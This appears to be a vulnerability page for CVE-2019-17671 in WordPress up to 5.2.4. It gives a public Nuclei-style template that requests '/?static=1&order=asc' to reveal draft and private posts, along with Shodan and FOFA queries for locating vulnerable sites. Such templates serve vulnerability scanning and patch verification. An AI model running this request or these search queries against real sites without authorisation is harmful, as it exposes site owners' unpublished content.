漏洞描述
WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.
CVE-2019-17671: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
PoC代码[已公开]
id: CVE-2019-17671
info:
name: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
author: 0x_Akoko
severity: medium
description: |
WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.
impact: |
Unauthenticated users can view restricted content, leading to information disclosure.
remediation: |
Update to WordPress 5.2.4 or later.
reference:
- https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-523-security-and-maintenance-release.html
- https://core.trac.wordpress.org/changeset/46474
- https://nvd.nist.gov/vuln/detail/CVE-2019-17671
- https://seclists.org/bugtraq/2020/Jan/8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-17671
cwe-id: CWE-200
epss-score: 0.82836
epss-percentile: 0.99204
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"wordpress" http.html:"status-draft"
fofa-query: body="Wordpress" && body="status-draft"
tags: cve,cve2019,wp,wordpress,unauth,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/?static=1&order=asc"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'type-page status-draft'
- 'type-post status-draft'
condition: or
- type: regex
part: body
regex:
- 'class="[^"]*entry-title[^"]*"[^>]*>[^<]{3,}'
- 'WordPress ([0-4]\.|5\.[0-2]\.|5\.2\.[0-3])'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cbbf7ec44456ae990048e732a8f6ae4ce7d1650dd0f4730a9f4aa343786af2a4022100a90c262e21b68f91642ed85d55d1423946fef8d3f4760f6c58b9289a837d1a83:922c64590222798bb761d5b6d8e72950